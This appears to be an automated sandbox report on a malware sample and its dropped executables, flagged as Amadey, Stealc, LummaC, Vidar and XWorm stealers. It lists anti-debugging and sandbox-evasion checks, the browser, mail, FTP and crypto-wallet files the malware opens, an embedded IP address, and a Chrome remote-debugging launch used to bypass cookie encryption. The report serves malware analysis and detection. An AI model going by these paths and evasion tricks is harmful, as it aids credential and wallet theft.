Source: file.exe, 00000000.00000002.1858231142.00000000013A9000.00000040.00000001.01000000.00000003.sdmp, AAAAECGHCB.exe, 00000014.00000002.1870386937.0000000000735000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000002.1909794828.0000000000435000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000016.00000002.1908863789.0000000000435000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000019.00000002.2507323193.0000000000435000.00000040.00000001.01000000.0000000E.sdmp, qk4EiZw.exe, 0000001B.00000002.2504418022.0000000000353000.00000040.00000001.01000000.0000000F.sdmp, 9faf801df7.exe, 0000001C.00000002.2342834166.0000000000713000.00000040.00000001.01000000.00000011.sdmp, 0fb4fa91ba.exe, 0000001D.00000002.2479056374.0000000000FC9000.00000040.00000001.01000000.00000013.sdmp, 9faf801df7.exe, 00000020.00000002.2504710537.0000000000713000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: JJJJEBGD.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: JJJJEBGD.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: JJJJEBGD.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: JJJJEBGD.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Process queried: DebugPort

Source: C:\Users\user\Documents\AAAAECGHCB.exe

Code function: 20_2_04DA0CC8 rdtsc

20_2_04DA0CC8

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CF4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CF4AC62

Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_0057652B mov eax, dword ptr fs:[00000030h]	20_2_0057652B
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_0057A302 mov eax, dword ptr fs:[00000030h]	20_2_0057A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0027A302 mov eax, dword ptr fs:[00000030h]	21_2_0027A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0027652B mov eax, dword ptr fs:[00000030h]	21_2_0027652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0027A302 mov eax, dword ptr fs:[00000030h]	22_2_0027A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0027652B mov eax, dword ptr fs:[00000030h]	22_2_0027652B

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CF4AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CF4AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 6564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0fb4fa91ba.exe PID: 6060, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\AAAAECGHCB.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\AAAAECGHCB.exe "C:\Users\user\Documents\AAAAECGHCB.exe"	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe "C:\Users\user~1\AppData\Local\Temp\1012933001\qk4EiZw.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe "C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe "C:\Users\user~1\AppData\Local\Temp\1012943001\0fb4fa91ba.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe "C:\Users\user~1\AppData\Local\Temp\1012944001\e0da62c8af.exe"

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CF94760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6CF94760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CE71C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6CE71C30

Source: e0da62c8af.exe, 0000001F.00000002.2505798261.00000000006F2000.00000002.00000001.01000000.00000014.sdmp, e0da62c8af.exe.25.dr, random[2].exe.25.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: qk4EiZw.exe, 0000001B.00000002.2504418022.0000000000353000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: SProgram Manager
Source: file.exe, file.exe, 00000000.00000002.1861090715.00000000013EA000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: y\Program Manager
Source: 9faf801df7.exe, 0000001C.00000002.2342834166.0000000000713000.00000040.00000001.01000000.00000011.sdmp, 9faf801df7.exe, 00000020.00000002.2504710537.0000000000713000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: Program Manager
Source: AAAAECGHCB.exe, 00000014.00000002.1870982195.000000000077E000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000002.1911800208.000000000047E000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000016.00000002.1910486281.000000000047E000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: RProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CF4AE71 cpuid

0_2_6CF4AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CF4A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CF4A8DC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CE98390 NSS_GetVersion,

0_2_6CE98390

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: qk4EiZw.exe, 0000001B.00000003.2405165043.0000000008640000.00000004.00000020.00020000.00000000.sdmp, qk4EiZw.exe, 0000001B.00000002.2509170115.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, qk4EiZw.exe, 0000001B.00000003.2404028265.0000000008640000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 21.2.skotes.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.skotes.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AAAAECGHCB.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.skotes.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.1908666630.0000000000241000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2504021712.0000000000241000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1869616191.0000000000541000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1908076388.0000000000241000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 29.2.0fb4fa91ba.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.2478530971.0000000000BE1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2480751384.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1852024640.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0fb4fa91ba.exe PID: 6060, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6564, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 27.2.qk4EiZw.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000003.2205328066.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2518875337.0000000005395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2503940481.00000000001C2000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qk4EiZw.exe PID: 7600, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000000.00000002.1852024640.0000000001127000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: exodus.conf.json
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: ElectrumLTC
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: passphrase.json
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.1852024640.0000000001075000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Ethereum\
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus
Source: file.exe, 00000000.00000002.1867859972.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16ontdesk\AppData\Roaming\Binance\app-store.json
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.1852024640.0000000001075000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum
Source: file.exe, 00000000.00000002.1852024640.0000000001127000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.1852024640.0000000001075000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: keystore
Source: file.exe, 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Documents\AAAAECGHCB.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Source: Yara match	File source: 0.2.file.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6564, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 29.2.0fb4fa91ba.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000002.2478530971.0000000000BE1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
